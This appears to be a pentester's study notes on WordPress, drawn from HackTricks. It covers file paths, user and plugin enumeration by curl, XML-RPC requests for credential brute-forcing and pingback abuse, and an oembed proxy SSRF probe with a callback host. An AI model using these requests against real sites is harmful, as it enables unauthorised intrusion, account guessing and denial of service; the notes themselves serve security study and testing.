写在前面
wordpress学习信息主要来自HackTricks
基本信息
Themes files can be found in/wp-content/themes/
For example: Using theme twentytwelve you can access the 404.php file in**:** /wp-content/themes/twentytwelve/404.php
Another useful url could be: /wp-content/themes/default/404.php
In wp-config.php you can find the root password of the database.
Default login paths to check: *** /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/\ ***
主要文件
index.php,license.txt
wp-activate.php is used for the email activation process when setting up a new WordPress site.
Login folders:
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.phpxmlrpc.php(一个文件,使用HTTP相应码知识API错误)
is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
The wp-content folder is the main directory where plugins and themes are stored.
wp-content/uploads/ Is the directory where any files uploaded to the platform are stored.
wp-includes/ This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
The wp-config.php file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
Passive enumeration
Get Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Get Themes
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Extract versions in general
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2Active enumeration
Users
curl -s -I -X GET http://blog.example.com/?author=1
curl http://blog.example.com/wp-json/wp/v2/usersXML-RPC
If xml-rpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process using this for example).
To see if it is active try to access to /xmlrpc.php and send(POST) this request:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>/wp-json/oembed/1.0/proxy - SSRF
Try to access https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net and the Worpress site may make a request to you.
